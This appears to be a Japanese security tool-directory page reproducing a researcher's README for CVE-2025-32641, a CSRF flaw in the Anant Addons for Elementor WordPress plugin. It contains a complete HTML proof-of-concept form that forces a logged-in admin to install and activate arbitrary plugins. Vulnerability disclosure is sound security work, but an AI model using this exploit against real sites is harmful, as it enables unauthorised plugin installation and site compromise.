Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-32641 — Anant Addons for Elementor <= 1.1.5 におけるCSRFを利用した任意プラグインインストールの脆弱性 | Kitploit
ツール/GitHubGitHub/nxploited/cve-2025-32641
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティ論文と研究学習と教育
GitHubnxploited/cve-2025-32641

CVE-2025-32641

Anant Addons for Elementor <= 1.1.5 におけるCSRFを利用した任意プラグインインストールの脆弱性

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🛡️ Anant Addons for Elementor <= 1.1.5 - CSRFによる任意のプラグインインストール

🧨 CVE-2025-32641

anantaddons の Anant Addons for Elementor における クロスサイトリクエストフォージェリ (CSRF) の脆弱性
この問題は以下のバージョンに影響します: 不明なバージョンから 1.1.5 まで

  • 基本スコア: 9.6 (緊急)
  • CVSS ベクトル: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

🔍 概要

この脆弱性により、認証されていない攻撃者 は、ログイン済みの管理者の知らないうちに、その管理者に代わって 任意のプラグインインストール を実行できます。
悪意のあるページやフォームを作成することで、攻撃者は管理者に WordPress リポジトリから任意のプラグインをサイレントにインストールおよびアクティブ化させることができます。


💥 影響

  • ✅ 任意のプラグインインストール
  • ✅ プラグインのアクティブ化
  • ❌ nonce または CSRF 保護なし
  • ✅ 単純な HTML ページで悪用可能
  • ⚠️ 管理者がログインし、悪意のあるページを開く必要あり

🧪 HTML 概念実証 (PoC)

root@kitploit:~
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Anant Addons for Elementor <= 1.1.5 CSRF Exploit</title>
  <style>
    body {
      background-color: #111;
      color: #0f0;
      font-family: monospace;
      padding: 40px;
    }
    h1 {
      color: #ff0055;
      font-size: 24px;
      border-bottom: 1px solid #555;
      padding-bottom: 10px;
    }
    .box {
      background-color: #222;
      border: 1px solid #444;
      padding: 20px;
      margin-top: 20px;
    }
    input[type="submit"] {
      background-color: #ff0055;
      color: #fff;
      border: none;
      padding: 10px 20px;
      font-weight: bold;
      cursor: pointer;
    }
    input[type="submit"]:hover {
      background-color: #cc0044;
    }
  </style>
</head>
<body>

  <h1>
    Anant Addons for Elementor <= 1.1.5<br>
    CSRF to Arbitrary Plugin Installation Vulnerability
  </h1>

  <div class="box">
    <p># By: <strong>Nxploited | Khaled Alenazi</strong></p>
    <p># Type: <strong>CSRF (No Nonce Validation)</strong></p>
    <p># Impact: <strong>Unauthenticated attacker can force admin to install and activate arbitrary WordPress plugins</strong></p>
  </div>

  <form action="http://192.168.100.74:888/wordpress/wp-admin/admin-ajax.php?action=install_act_plugin" method="POST" class="box">
    <input type="hidden" name="plugs" value="hello-dolly">
    <p>🎯 Click the button below to trigger plugin installation (admin session must be active):</p>
    <input type="submit" value="Exploit Now">
  </form>

</body>
</html>


🎯 ログイン済みの管理者がこのフォームをクリックすると(または悪意のあるページで自動送信されると)、プラグインがサイレントにインストールされ、アクティブ化されます。


⚠️ 免責事項

このリポジトリおよびコンテンツは、教育およびセキュリティ研究目的のみ を対象としています。
著者は、この情報の不適切な使用によって生じた誤用や損害について 一切責任を負いません。
必ず 自分が所有しているか、テストする明示的な許可を得ている システムでのみテストを実行してください。


by: Nxploited | Khaled ALenazi

ツールをダウンロード